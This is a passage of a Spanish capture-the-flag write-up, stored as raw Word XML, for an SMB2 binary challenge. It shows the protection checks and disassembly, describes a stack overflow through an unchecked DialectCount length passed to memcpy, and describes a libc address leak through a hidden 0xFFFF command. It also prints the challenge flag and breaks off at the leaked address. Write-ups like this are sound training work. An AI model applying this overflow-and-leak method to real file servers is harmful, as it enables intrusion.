          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>checksec</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>nm</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>readelf</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, Python y pwntools.</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Flag obtenida</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Flag verificada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Copiar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>PENTRAZE{689a7ccd0836e3eebc165b9339f45dafc5be402ce46d630e045550cfc74ca5e3}</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1. Descripción del reto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockQuotationuser"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Durante una auditoría de red en Acheron Systems, el equipo de respuesta encontró un servidor que nadie recuerda haber desplegado. No tiene nombre, no tiene dueño, no tiene documentación. Los logs de switches dicen que lleva 847 días encendido. Acepta cualquier conexión. Nunca las corta. Y no aparece en ningún inventario. Alguien lo vio, lo marcó como legacy en el CMDB, y siguió con su día.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El reto proporcionaba un servicio TCP y un archivo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>smbiablo.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, que contenía el ejecutable vulnerable y una biblioteca </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>libc.so.6</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El objetivo era identificar una vulnerabilidad explotable en la implementación del protocolo SMB2, conseguir ejecución de comandos y recuperar la flag.</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2. Reconocimiento inicial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La conexión al servicio se realizó mediante:</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nc 34.135.253.132 36102</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El servidor mostraba un banner:</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Acheron Systems — Internal File Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACHERON-FS-07 · ACHERON.INTERNAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Protocol   SMB2 / CIFS v2.3.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Status     OPERATIONAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Inicialmente se probó </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>HELP</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, pero no existía una interfaz textual de comandos. El servicio esperaba paquetes binarios con estructura SMB2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Después se extrajeron los archivos proporcionados:</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unzip ~/Escritorio/smbiablo.zip -d ~/ctf/smbiablo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cd ~/ctf/smbiablo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>file smbiablo libc.so.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Se identificó un ejecutable ELF de 64 bits, x86-64, dinámicamente enlazado y con símbolos disponibles, junto a una biblioteca libc específica para el reto.</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3. Análisis de protecciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Se utilizó:</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checksec --file=./smbiablo</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="3033" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="1593"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Protección</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1593" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Resultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>RELRO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1593" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Partial RELRO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Stack Canary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1593" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>NX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1593" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Activado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>PIE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1593" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Desactivado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Símbolos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1593" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La ausencia de stack canary y PIE facilitaba una posible explotación mediante corrupción de la pila. Sin embargo, NX impedía depender de una ejecución directa de código inyectado en la pila.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Por ello, una técnica como ret2libc resultaba especialmente interesante.</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4. Ingeniería inversa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El análisis de símbolos permitió identificar tres funciones importantes:</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0x4014d6  send_banner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x4015e5  send_smb2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x401702  handle_negotiate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x4017d3  main</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El desensamblado se realizó con:</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objdump -d -M intel ./smbiablo \</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--start-address=0x401702 \</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--stop-address=0x4017d3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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4.1 Vulnerabilidad Stack Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Dentro de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>handle_negotiate()</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> apareció la siguiente secuencia:</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401717: lea    rdi,[rsp+0x50]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>40171c: movzx  edx,WORD PTR [rsi+0x2]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>401720: add    edx,edx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>401725: add    rsi,0x24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>401729: call   memcpy@plt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El programa leía el campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>DialectCount</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> del paquete SMB2, lo multiplicaba por dos y utilizaba ese valor como longitud para </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>memcpy()</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El problema era que no comprobaba que los datos cupieran dentro del búfer local.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Esto permitía sobrescribir información adyacente de la pila, incluida la dirección de retorno.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El desplazamiento utilizado hasta RIP fue de 56 bytes, y el exploit empleó un contador de 48 dialectos, provocando una copia de 96 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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 xml:space="preserve">4.2 Filtración de memoria mediante </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0xFFFF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>También se descubrió un comando SMB2 especial:</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401cd0: mov rax,QWORD PTR [rip+0x2319]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>401cd7: mov QWORD PTR [rsp+0x58],rax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>401cec: mov edx,0xffff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>401cf3: call send_smb2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Este comando devolvía el puntero asociado a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> obtenido de la GOT del ejecutable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La filtración permitía calcular la dirección base de libc y preparar una cadena ROP con direcciones válidas.</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5. Explotación de ASLR mediante Information Leak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Se construyó un paquete SMB2 con el comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>0xFFFF</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y se envió al servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La respuesta contenía una dirección de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</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printf:        0x722580cd06f0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
